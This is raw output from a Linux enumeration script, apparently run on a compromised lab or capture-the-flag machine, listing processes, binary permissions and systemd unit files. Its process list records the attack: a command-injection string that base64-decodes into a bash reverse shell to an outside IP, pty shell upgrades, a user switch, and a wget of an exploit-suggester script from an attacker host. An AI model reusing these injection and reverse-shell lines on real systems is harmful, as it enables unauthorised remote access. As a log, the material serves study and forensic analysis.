root     23227  0.0  0.0      0     0 ?        I    06:46   0:00 [kworker/u4:2]
www-data 23234  0.0  0.7 372240 28520 ?        S    06:46   0:00 /usr/sbin/apache2 -k start
www-data 23312  0.0  0.7 372044 29124 ?        S    06:49   0:00 /usr/sbin/apache2 -k start
www-data 23362  0.0  0.0   4628   820 ?        S    06:51   0:00 sh -c faxstat -r -l -h || echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC43MC84ODg4IDA+JjE=|base64 -d|bash
www-data 23365  0.0  0.0  18376  3024 ?        S    06:51   0:00 bash
www-data 23366  0.0  0.0  18508  3444 ?        S    06:51   0:00 bash -i
www-data 23394  0.0  0.2  37428  9332 ?        S    06:52   0:00 python3 -c import pty;pty.spawn("/bin/bash")
www-data 23395  0.0  0.0  18508  3428 pts/1    Ss   06:52   0:00 /bin/bash
root     23403  0.0  0.0  60084  3344 pts/1    S    06:52   0:00 su ash
ash      23405  0.0  0.1  76684  7720 ?        Ss   06:52   0:00 /lib/systemd/systemd --user
ash      23412  0.0  0.0 259192  2440 ?        S    06:52   0:00 (sd-pam)
ash      23430  0.0  0.1  21288  5076 pts/1    S    06:52   0:00 bash
ash      23502  0.0  0.0  14100  1848 pts/1    S+   06:54   0:00 telnet 127.0.0.1 11211
root     23738  0.0  0.0  60084  3460 ?        S    07:02   0:00 su - ash
ash      23846  0.0  0.1  21404  5148 ?        S    07:02   0:00 -su
root     23896  0.0  0.0      0     0 ?        I    07:03   0:00 [kworker/0:1]
root     24032  0.0  0.0      0     0 ?        I    07:08   0:00 [kworker/u4:1]
root     24122  0.0  0.0      0     0 ?        I    07:09   0:00 [kworker/1:2]
ash      24155  0.0  0.0  31012  2276 ?        S    07:10   0:00 wget http://10.10.15.166:8000/les.sh
www-data 24175  0.0  0.0   4628   876 ?        S    07:11   0:00 sh -c uname -a; w; id; /bin/sh -i
www-data 24179  0.0  0.0   4628   780 ?        S    07:11   0:00 /bin/sh -i
www-data 24184  0.0  0.2  37296  9396 ?        S    07:11   0:00 python3 -c import pty; pty.spawn('/bin/bash');
www-data 24185  0.0  0.0  18508  3404 pts/2    Ss   07:11   0:00 /bin/bash
root     24188  0.0  0.0  60084  3488 pts/2    S    07:11   0:00 su - ash
ash      24206  0.0  0.1  21404  5000 pts/2    S    07:12   0:00 -su
root     25695  0.0  0.0      0     0 ?        I    07:16   0:00 [kworker/u4:0]
ash      25743  0.0  0.1  12384  4104 pts/2    S+   07:18   0:00 bash lnum.sh
ash      25744  0.0  0.0  12516  3108 pts/2    S+   07:18   0:00 bash lnum.sh
ash      25745  0.0  0.0   6180   736 pts/2    S+   07:18   0:00 tee -a
ash      25940  0.0  0.0  12516  2860 pts/2    S+   07:18   0:00 bash lnum.sh
ash      25941  0.0  0.0  38376  3700 pts/2    R+   07:18   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
 1088 -rwxr-xr-x 1 root root  1113504 Aug 11 04:08 /bin/bash
    0 lrwxrwxrwx 1 root root        4 Aug 11 04:08 /bin/sh -> dash
 1576 -rwxr-xr-x 1 root root  1612152 Aug 11 06:52 /lib/systemd/systemd
  128 -rwxr-xr-x 1 root root   129096 May  5 11:12 /lib/systemd/systemd-journald
  216 -rwxr-xr-x 1 root root   219272 Aug 11 04:08 /lib/systemd/systemd-logind
 1592 -rwxr-xr-x 1 root root  1629264 Mar 20 06:59 /lib/systemd/systemd-networkd
  372 -rwxr-xr-x 1 root root   378944 Mar 20 06:59 /lib/systemd/systemd-resolved
   40 -rwxr-xr-x 1 root root    38976 Mar 20 06:59 /lib/systemd/systemd-timesyncd
  572 -rwxr-xr-x 1 root root   584136 Aug 11 04:08 /lib/systemd/systemd-udevd
   56 -rwxr-xr-x 1 root root    56552 Aug 11 04:08 /sbin/agetty
    0 lrwxrwxrwx 1 root root       20 Aug 11 04:10 /sbin/init -> /lib/systemd/systemd
   84 -rwxr-xr-x 1 root root    84104 Jul  9 09:22 /sbin/lvmetad
43276 -rwxr-xr-x 1 root root 44311744 Aug 11 04:08 /usr/bin/containerd
  232 -rwxr-xr-x 1 root root   236584 Aug 11 04:08 /usr/bin/dbus-daemon
    0 lrwxrwxrwx 1 root root       25 Aug 11 04:08 /usr/bin/dockerd -> /etc/alternatives/dockerd
   20 -rwxr-xr-x 1 root root    18504 Aug 11 04:08 /usr/bin/lxcfs
  164 -rwxr-xr-x 1 root root   167592 Sep 18  2019 /usr/bin/memcached
    0 lrwxrwxrwx 1 root root        9 Aug 11 04:08 /usr/bin/python3 -> python3.6
  124 -rwxr-xr-x 1 root root   125144 Aug 11 04:08 /usr/bin/VGAuthService
   48 -rwxr-xr-x 1 root root    47360 May  5 11:12 /usr/bin/vmtoolsd
  180 -rwxr-xr-x 1 root root   182552 Aug 11 04:08 /usr/lib/accountsservice/accounts-daemon
   16 -rwxr-xr-x 1 root root    14552 Aug 11 04:08 /usr/lib/policykit-1/polkitd
16716 -rwxr-xr-x 1 root root 17117160 Aug 11 04:08 /usr/lib/snapd/snapd
  656 -rwxr-xr-x 1 root root   671392 Aug 11 04:08 /usr/sbin/apache2
   28 -rwxr-xr-x 1 root root    26632 Aug 11 04:08 /usr/sbin/atd
   48 -rwxr-xr-x 1 root root    47416 Aug 11 04:08 /usr/sbin/cron
   64 -rwxr-xr-x 1 root root    64184 Aug 11 04:08 /usr/sbin/irqbalance
24072 -rwxr-xr-x 1 root root 24646760 Aug 11 04:08 /usr/sbin/mysqld
  668 -rwxr-xr-x 1 root root   680488 Aug 11 04:08 /usr/sbin/rsyslogd
  772 -rwxr-xr-x 1 root root   786856 Aug 11 04:08 /usr/sbin/sshd


[-] /etc/init.d/ binary permissions:
total 196
drwxr-xr-x  2 root root 4096 Jul  9 09:25 .
drwxr-xr-x 99 root root 4096 Jul  9 09:26 ..
-rwxr-xr-x  1 root root 2269 Apr 22  2017 acpid
-rwxr-xr-x  1 root root 8181 Jul 16  2019 apache2
-rwxr-xr-x  1 root root 2489 Jul 16  2019 apache-htcacheclean
-rwxr-xr-x  1 root root 4335 Mar 22  2018 apparmor
-rwxr-xr-x  1 root root 2805 Feb 27 03:18 apport
-rwxr-xr-x  1 root root 1071 Aug 21  2015 atd
-rwxr-xr-x  1 root root 1232 Apr 19  2018 console-setup.sh
-rwxr-xr-x  1 root root 3049 Nov 16  2017 cron
-rwxr-xr-x  1 root root  937 Mar 18  2018 cryptdisks
-rwxr-xr-x  1 root root  978 Mar 18  2018 cryptdisks-early
-rwxr-xr-x  1 root root 2813 Nov 15  2017 dbus
-rwxr-xr-x  1 root root 3843 Jan  9  2019 docker
-rwxr-xr-x  1 root root 4489 Jun 28  2018 ebtables
-rwxr-xr-x  1 root root  985 Mar 18  2019 grub-common
-rwxr-xr-x  1 root root 3809 Feb 14  2018 hwclock.sh
-rwxr-xr-x  1 root root 2444 Oct 25  2017 irqbalance
-rwxr-xr-x  1 root root 1503 Dec 12  2018 iscsid
-rwxr-xr-x  1 root root 1479 Feb 15  2018 keyboard-setup.sh
-rwxr-xr-x  1 root root 2044 Aug 15  2017 kmod
-rwxr-xr-x  1 root root  695 Dec  3  2017 lvm2
-rwxr-xr-x  1 root root  571 Dec  3  2017 lvm2-lvmetad
-rwxr-xr-x  1 root root  586 Dec  3  2017 lvm2-lvmpolld
-rwxr-xr-x  1 root root 2378 Nov 23  2018 lxcfs
-rwxr-xr-x  1 root root 2240 Nov 23  2018 lxd
-rwxr-xr-x  1 root root 2653 Jun 26  2018 mdadm
-rwxr-xr-x  1 root root 1249 Jun 26  2018 mdadm-waitidle
-rwxr-xr-x  1 root root 3408 Sep  5  2019 memcached
-rwxr-xr-x  1 root root 5607 Jan 12  2018 mysql
-rwxr-xr-x  1 root root 2503 Dec 12  2018 open-iscsi
-rwxr-xr-x  1 root root 1846 Sep 10  2018 open-vm-tools
-rwxr-xr-x  1 root root 1366 Jan 17  2018 plymouth
-rwxr-xr-x  1 root root  752 Jan 17  2018 plymouth-log
-rwxr-xr-x  1 root root 1191 Jan 17  2018 procps
-rwxr-xr-x  1 root root 4355 Dec 13  2017 rsync
-rwxr-xr-x  1 root root 2864 Jan 14  2018 rsyslog
-rwxr-xr-x  1 root root 1222 May 21  2017 screen-cleanup
-rwxr-xr-x  1 root root 3837 Jan 25  2018 ssh
-rwxr-xr-x  1 root root 5974 Apr 20  2018 udev
-rwxr-xr-x  1 root root 2083 Aug 15  2017 ufw
-rwxr-xr-x  1 root root 1391 Dec 13  2018 unattended-upgrades
-rwxr-xr-x  1 root root 1306 Oct 15  2018 uuidd


[-] /etc/init/ config file permissions:
total 16
drwxr-xr-x  2 root root 4096 May  5 11:13 .
drwxr-xr-x 99 root root 4096 Jul  9 09:26 ..
-rw-r--r--  1 root root 1875 Jan  9  2019 docker.conf
-rw-r--r--  1 root root 1757 Jan 12  2018 mysql.conf


[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 7.3M
drwxr-xr-x 23 root root  36K Jul  9 09:25 system
drwxr-xr-x  2 root root 4.0K Mar 20 06:59 system-generators
drwxr-xr-x  2 root root 4.0K Mar 20 06:59 system-preset
drwxr-xr-x  2 root root 4.0K Mar 20 06:59 network
-rw-r--r--  1 root root 2.3M Feb  5  2020 libsystemd-shared-237.so
-rw-r--r--  1 root root  699 Feb  5  2020 resolv.conf
-rwxr-xr-x  1 root root 1.3K Feb  5  2020 set-cpufreq
-rwxr-xr-x  1 root root 1.6M Feb  5  2020 systemd
-rwxr-xr-x  1 root root 6.0K Feb  5  2020 systemd-ac-power
-rwxr-xr-x  1 root root  18K Feb  5  2020 systemd-backlight
-rwxr-xr-x  1 root root  11K Feb  5  2020 systemd-binfmt
-rwxr-xr-x  1 root root  10K Feb  5  2020 systemd-cgroups-agent
-rwxr-xr-x  1 root root  27K Feb  5  2020 systemd-cryptsetup
-rwxr-xr-x  1 root root  15K Feb  5  2020 systemd-dissect
-rwxr-xr-x  1 root root  18K Feb  5  2020 systemd-fsck
-rwxr-xr-x  1 root root  23K Feb  5  2020 systemd-fsckd
-rwxr-xr-x  1 root root  19K Feb  5  2020 systemd-growfs
-rwxr-xr-x  1 root root  10K Feb  5  2020 systemd-hibernate-resume
-rwxr-xr-x  1 root root  23K Feb  5  2020 systemd-hostnamed
-rwxr-xr-x  1 root root  15K Feb  5  2020 systemd-initctl
-rwxr-xr-x  1 root root 127K Feb  5  2020 systemd-journald
-rwxr-xr-x  1 root root  35K Feb  5  2020 systemd-localed
-rwxr-xr-x  1 root root 215K Feb  5  2020 systemd-logind
-rwxr-xr-x  1 root root  10K Feb  5  2020 systemd-makefs
-rwxr-xr-x  1 root root  15K Feb  5  2020 systemd-modules-load
-rwxr-xr-x  1 root root 1.6M Feb  5  2020 systemd-networkd
-rwxr-xr-x  1 root root  19K Feb  5  2020 systemd-networkd-wait-online
-rwxr-xr-x  1 root root  11K Feb  5  2020 systemd-quotacheck
-rwxr-xr-x  1 root root  10K Feb  5  2020 systemd-random-seed
-rwxr-xr-x  1 root root  15K Feb  5  2020 systemd-remount-fs
-rwxr-xr-x  1 root root  10K Feb  5  2020 systemd-reply-password
-rwxr-xr-x  1 root root 371K Feb  5  2020 systemd-resolved
-rwxr-xr-x  1 root root  19K Feb  5  2020 systemd-rfkill
-rwxr-xr-x  1 root root  43K Feb  5  2020 systemd-shutdown
-rwxr-xr-x  1 root root  19K Feb  5  2020 systemd-sleep
-rwxr-xr-x  1 root root  23K Feb  5  2020 systemd-socket-proxyd
-rwxr-xr-x  1 root root  11K Feb  5  2020 systemd-sulogin-shell
-rwxr-xr-x  1 root root  15K Feb  5  2020 systemd-sysctl
-rwxr-xr-x  1 root root  27K Feb  5  2020 systemd-timedated
-rwxr-xr-x  1 root root  39K Feb  5  2020 systemd-timesyncd
-rwxr-xr-x  1 root root 571K Feb  5  2020 systemd-udevd
-rwxr-xr-x  1 root root  15K Feb  5  2020 systemd-update-utmp
-rwxr-xr-x  1 root root  10K Feb  5  2020 systemd-user-sessions
-rwxr-xr-x  1 root root  10K Feb  5  2020 systemd-veritysetup
-rwxr-xr-x  1 root root  10K Feb  5  2020 systemd-volatile-root
-rwxr-xr-x  1 root root 1.3K Nov 15  2019 systemd-sysv-install
drwxr-xr-x  2 root root 4.0K Feb 14  2019 system-sleep
drwxr-xr-x  2 root root 4.0K Feb 14  2019 system-shutdown

/lib/systemd/system:
total 1.1M
drwxr-xr-x 2 root root 4.0K Jul  9 09:25 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Jul  9 09:25 sockets.target.wants
-rw-r--r-- 1 root root  505 Jun 11 18:25 dbus.service
-rw-r--r-- 1 root root  106 Jun 11 18:25 dbus.socket
drwxr-xr-x 2 root root 4.0K Mar 20 06:59 getty.target.wants
drwxr-xr-x 2 root root 4.0K Mar 20 06:59 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Mar 20 06:59 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Mar 20 06:59 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Mar 20 06:59 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Mar 20 06:59 timers.target.wants
drwxr-xr-x 2 root root 4.0K Mar 20 06:59 rc-local.service.d
drwxr-xr-x 2 root root 4.0K Mar 20 06:59 user@.service.d
drwxr-xr-x 2 root root 4.0K Mar 20 06:59 apache2.service.d
lrwxrwxrwx 1 root root   14 Feb  5  2020 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root    9 Feb  5  2020 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 checkroot.service -> /dev/null
-rw-r--r-- 1 root root 1.1K Feb  5  2020 console-getty.service
-rw-r--r-- 1 root root 1.3K Feb  5  2020 container-getty@.service
lrwxrwxrwx 1 root root    9 Feb  5  2020 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root   13 Feb  5  2020 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Feb  5  2020 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Feb  5  2020 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 Feb  5  2020 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   25 Feb  5  2020 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Feb  5  2020 debug-shell.service
lrwxrwxrwx 1 root root   16 Feb  5  2020 default.target -> graphical.target
-rw-r--r-- 1 root root  797 Feb  5  2020 emergency.service
lrwxrwxrwx 1 root root    9 Feb  5  2020 fuse.service -> /dev/null
-rw-r--r-- 1 root root 2.0K Feb  5  2020 getty@.service
lrwxrwxrwx 1 root root    9 Feb  5  2020 halt.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 hwclock.service -> /dev/null
-rw-r--r-- 1 root root  670 Feb  5  2020 initrd-cleanup.service
-rw-r--r-- 1 root root  830 Feb  5  2020 initrd-parse-etc.service
-rw-r--r-- 1 root root  589 Feb  5  2020 initrd-switch-root.service
-rw-r--r-- 1 root root  704 Feb  5  2020 initrd-udevadm-cleanup-db.service
lrwxrwxrwx 1 root root    9 Feb  5  2020 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root   28 Feb  5  2020 kmod.service -> systemd-modules-load.service
-rw-r--r-- 1 root root  717 Feb  5  2020 kmod-static-nodes.service
lrwxrwxrwx 1 root root   28 Feb  5  2020 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root    9 Feb  5  2020 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root   22 Feb  5  2020 procps.service -> systemd-sysctl.service
-rw-r--r-- 1 root root  609 Feb  5  2020 quotaon.service
-rw-r--r-- 1 root root  716 Feb  5  2020 rc-local.service
lrwxrwxrwx 1 root root   16 Feb  5  2020 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root    9 Feb  5  2020 rc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 rcS.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 reboot.service -> /dev/null
-rw-r--r-- 1 root root  788 Feb  5  2020 rescue.service
lrwxrwxrwx 1 root root    9 Feb  5  2020 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root   15 Feb  5  2020 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Feb  5  2020 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Feb  5  2020 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Feb  5  2020 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Feb  5  2020 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   16 Feb  5  2020 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Feb  5  2020 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root    9 Feb  5  2020 sendsigs.service -> /dev/null
-rw-r--r-- 1 root root 1.5K Feb  5  2020 serial-getty@.service
lrwxrwxrwx 1 root root    9 Feb  5  2020 single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 stop-bootlogd-single.service -> /dev/null
-rw-r--r-- 1 root root  554 Feb  5  2020 suspend-then-hibernate.target
-rw-r--r-- 1 root root  724 Feb  5  2020 systemd-ask-password-console.service
-rw-r--r-- 1 root root  752 Feb  5  2020 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  752 Feb  5  2020 systemd-backlight@.service
-rw-r--r-- 1 root root  999 Feb  5  2020 systemd-binfmt.service
-rw-r--r-- 1 root root  537 Feb  5  2020 systemd-exit.service
-rw-r--r-- 1 root root  551 Feb  5  2020 systemd-fsckd.service
-rw-r--r-- 1 root root  540 Feb  5  2020 systemd-fsckd.socket
-rw-r--r-- 1 root root  714 Feb  5  2020 systemd-fsck-root.service
-rw-r--r-- 1 root root  715 Feb  5  2020 systemd-fsck@.service
-rw-r--r-- 1 root root  584 Feb  5  2020 systemd-halt.service
-rw-r--r-- 1 root root  671 Feb  5  2020 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root  541 Feb  5  2020 systemd-hibernate.service
-rw-r--r-- 1 root root 1.2K Feb  5  2020 systemd-hostnamed.service
-rw-r--r-- 1 root root  818 Feb  5  2020 systemd-hwdb-update.service
-rw-r--r-- 1 root root  559 Feb  5  2020 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  551 Feb  5  2020 systemd-initctl.service
-rw-r--r-- 1 root root  686 Feb  5  2020 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.6K Feb  5  2020 systemd-journald.service
-rw-r--r-- 1 root root  771 Feb  5  2020 systemd-journal-flush.service
-rw-r--r-- 1 root root  597 Feb  5  2020 systemd-kexec.service
-rw-r--r-- 1 root root 1.2K Feb  5  2020 systemd-localed.service
-rw-r--r-- 1 root root 1.5K Feb  5  2020 systemd-logind.service
-rw-r--r-- 1 root root  733 Feb  5  2020 systemd-machine-id-commit.service
-rw-r--r-- 1 root root 1007 Feb  5  2020 systemd-modules-load.service
-rw-r--r-- 1 root root 1.9K Feb  5  2020 systemd-networkd.service
-rw-r--r-- 1 root root  740 Feb  5  2020 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root  593 Feb  5  2020 systemd-poweroff.service
-rw-r--r-- 1 root root  655 Feb  5  2020 systemd-quotacheck.service
-rw-r--r-- 1 root root  792 Feb  5  2020 systemd-random-seed.service
-rw-r--r-- 1 root root  588 Feb  5  2020 systemd-reboot.service
-rw-r--r-- 1 root root  833 Feb  5  2020 systemd-remount-fs.service
-rw-r--r-- 1 root root 1.7K Feb  5  2020 systemd-resolved.service
-rw-r--r-- 1 root root  724 Feb  5  2020 systemd-rfkill.service
-rw-r--r-- 1 root root  537 Feb  5  2020 systemd-suspend.service
-rw-r--r-- 1 root root  573 Feb  5  2020 systemd-suspend-then-hibernate.service
-rw-r--r-- 1 root root  693 Feb  5  2020 systemd-sysctl.service
-rw-r--r-- 1 root root 1.1K Feb  5  2020 systemd-timedated.service
-rw-r--r-- 1 root root 1.4K Feb  5  2020 systemd-timesyncd.service
-rw-r--r-- 1 root root  659 Feb  5  2020 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  764 Feb  5  2020 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  744 Feb  5  2020 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root 1006 Feb  5  2020 systemd-udevd.service
-rw-r--r-- 1 root root  863 Feb  5  2020 systemd-udev-settle.service
-rw-r--r-- 1 root root  755 Feb  5  2020 systemd-udev-trigger.service
-rw-r--r-- 1 root root  797 Feb  5  2020 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  794 Feb  5  2020 systemd-update-utmp.service
-rw-r--r-- 1 root root  628 Feb  5  2020 systemd-user-sessions.service
-rw-r--r-- 1 root root  690 Feb  5  2020 systemd-volatile-root.service
-rw-r--r-- 1 root root 1.4K Feb  5  2020 system-update-cleanup.service
lrwxrwxrwx 1 root root   21 Feb  5  2020 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root    9 Feb  5  2020 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb  5  2020 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root   27 Feb  5  2020 urandom.service -> systemd-random-seed.service
-rw-r--r-- 1 root root  593 Feb  5  2020 user@.service
lrwxrwxrwx 1 root root    9 Feb  5  2020 x11-common.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 31  2020 sudo.service -> /dev/null
-rw-r--r-- 1 root root  342 Nov 14  2019 getty-static.service
-rw-r--r-- 1 root root  362 Nov 14  2019 ondemand.service
-rw-r--r-- 1 root root  212 Nov 11  2019 apport-autoreport.path
-rw-r--r-- 1 root root  242 Nov 11  2019 apport-autoreport.service
-rw-r--r-- 1 root root  142 Nov 11  2019 apport-forward@.service
-rw-r--r-- 1 root root  246 Nov 11  2019 apport-forward.socket
-rw-r--r-- 1 root root 3.2K Sep  5  2019 memcached.service
-rw-r--r-- 1 root root  326 Sep  3  2019 apt-daily.service
-rw-r--r-- 1 root root  156 Sep  3  2019 apt-daily.timer
-rw-r--r-- 1 root root  238 Sep  3  2019 apt-daily-upgrade.service
-rw-r--r-- 1 root root  184 Sep  3  2019 apt-daily-upgrade.timer
-rw-r--r-- 1 root root  346 Jul 16  2019 apache2.service
-rw-r--r-- 1 root root  418 Jul 16  2019 apache2@.service
-rw-r--r-- 1 root root  528 Jul 16  2019 apache-htcacheclean.service
-rw-r--r-- 1 root root  537 Jul 16  2019 apache-htcacheclean@.service
-rw-r--r-- 1 root root  340 Mar 15  2019 snapd.autoimport.service
-rw-r--r-- 1 root root  320 Mar 15  2019 snapd.core-fixup.service
-rw-r--r-- 1 root root  172 Mar 15  2019 snapd.failure.service
-rw-r--r-- 1 root root  322 Mar 15  2019 snapd.seeded.service
-rw-r--r-- 1 root root  477 Mar 15  2019 snapd.service
-rw-r--r-- 1 root root  372 Mar 15  2019 snapd.snap-repair.service
-rw-r--r-- 1 root root  281 Mar 15  2019 snapd.snap-repair.timer
-rw-r--r-- 1 root root  281 Mar 15  2019 snapd.socket
-rw-r--r-- 1 root root  521 Mar 15  2019 snapd.system-shutdown.service
lrwxrwxrwx 1 root root    9 Feb 14  2019 screen-cleanup.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Feb 14  2019 halt.target.wants
drwxr-xr-x 2 root root 4.0K Feb 14  2019 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Feb 14  2019 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Feb 14  2019 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Feb 14  2019 reboot.target.wants
-rw-r--r-- 1 root root  254 Jan 14  2019 thermald.service
-rw-r--r-- 1 root root  266 Jan 10  2019 netplan-wpa@.service
-rw-r--r-- 1 root root 1.6K Jan  9  2019 docker.service
-rw-r--r-- 1 root root  197 Jan  9  2019 docker.socket
-rw-r--r-- 1 root root  368 Jan  9  2019 irqbalance.service
-rw-r--r-- 1 root root  487 Jan  8  2019 containerd.service
-rw-r--r-- 1 root root  372 Dec 13  2018 unattended-upgrades.service
-rw-r--r-- 1 root root  494 Dec 12  2018 iscsid.service
-rw-r--r-- 1 root root  175 Dec 12  2018 iscsid.socket
-rw-r--r-- 1 root root  987 Dec 12  2018 open-iscsi.service
-rw-r--r-- 1 root root  605 Nov 23  2018 lxd.service
-rw-r--r-- 1 root root  320 Nov 23  2018 lxd-containers.service
-rw-r--r-- 1 root root  197 Nov 23  2018 lxd.socket
-rw-r--r-- 1 root root  311 Nov 23  2018 lxcfs.service
-rw-r--r-- 1 root root   92 Oct 15  2018 fstrim.service
-rw-r--r-- 1 root root  170 Oct 15  2018 fstrim.timer
-rw-r--r-- 1 root root  189 Oct 15  2018 uuidd.service
-rw-r--r-- 1 root root  126 Oct 15  2018 uuidd.socket
-rw-r--r-- 1 root root  618 Oct 15  2018 friendly-recovery.service
-rw-r--r-- 1 root root  172 Oct 15  2018 friendly-recovery.target
-rw-r--r-- 1 root root  258 Oct 15  2018 networkd-dispatcher.service
-rw-r--r-- 1 root root  418 Oct  3  2018 cloud-config.service
-rw-r--r-- 1 root root  482 Oct  3  2018 cloud-final.service
-rw-r--r-- 1 root root  580 Oct  3  2018 cloud-init-local.service
-rw-r--r-- 1 root root  642 Oct  3  2018 cloud-init.service
-rw-r--r-- 1 root root  536 Oct  2  2018 cloud-config.target
-rw-r--r-- 1 root root  256 Oct  2  2018 cloud-init.target
-rw-r--r-- 1 root root  412 Sep 11  2018 plymouth-halt.service
-rw-r--r-- 1 root root  426 Sep 11  2018 plymouth-kexec.service
lrwxrwxrwx 1 root root   27 Sep 11  2018 plymouth-log.service -> plymouth-read-write.service
-rw-r--r-- 1 root root  421 Sep 11  2018 plymouth-poweroff.service
-rw-r--r-- 1 root root  194 Sep 11  2018 plymouth-quit.service
-rw-r--r-- 1 root root  200 Sep 11  2018 plymouth-quit-wait.service
-rw-r--r-- 1 root root  244 Sep 11  2018 plymouth-read-write.service
-rw-r--r-- 1 root root  416 Sep 11  2018 plymouth-reboot.service
lrwxrwxrwx 1 root root   21 Sep 11  2018 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root  532 Sep 11  2018 plymouth-start.service
-rw-r--r-- 1 root root  291 Sep 11  2018 plymouth-switch-root.service
-rw-r--r-- 1 root root  490 Sep 11  2018 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root  467 Sep 11  2018 systemd-ask-password-plymouth.service
-rw-r--r-- 1 root root  306 Sep 11  2018 open-vm-tools.service
-rw-r--r-- 1 root root  298 Sep 10  2018 vgauth.service
-rw-r--r-- 1 root root  173 Aug  6  2018 motd-news.service
-rw-r--r-- 1 root root  175 Aug  6  2018 motd-news.timer
-rw-r--r-- 1 root root  481 Jul  2  2018 mdadm-grow-continue@.service
-rw-r--r-- 1 root root  210 Jul  2  2018 mdadm-last-resort@.service
-rw-r--r-- 1 root root  179 Jul  2  2018 mdadm-last-resort@.timer
lrwxrwxrwx 1 root root    9 Jul  2  2018 mdadm.service -> /dev/null
-rw-r--r-- 1 root root  670 Jul  2  2018 mdadm-shutdown.service
lrwxrwxrwx 1 root root    9 Jul  2  2018 mdadm-waitidle.service -> /dev/null
-rw-r--r-- 1 root root  388 Jul  2  2018 mdmonitor.service
-rw-r--r-- 1 root root 1.1K Jul  2  2018 mdmon@.service
-rw-r--r-- 1 root root  456 Jun 28  2018 ebtables.service
-rw-r--r-- 1 root root  309 May 30  2018 pollinate.service
-rw-r--r-- 1 root root  290 Apr 24  2018 rsyslog.service
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel5.target.wants
-rw-r--r-- 1 root root  383 Apr 12  2018 blk-availability.service
-rw-r--r-- 1 root root  341 Apr 12  2018 dm-event.service
-rw-r--r-- 1 root root  248 Apr 12  2018 dm-event.socket
-rw-r--r-- 1 root root  345 Apr 12  2018 lvm2-lvmetad.service
-rw-r--r-- 1 root root  215 Apr 12  2018 lvm2-lvmetad.socket
-rw-r--r-- 1 root root  300 Apr 12  2018 lvm2-lvmpolld.service
-rw-r--r-- 1 root root  213 Apr 12  2018 lvm2-lvmpolld.socket
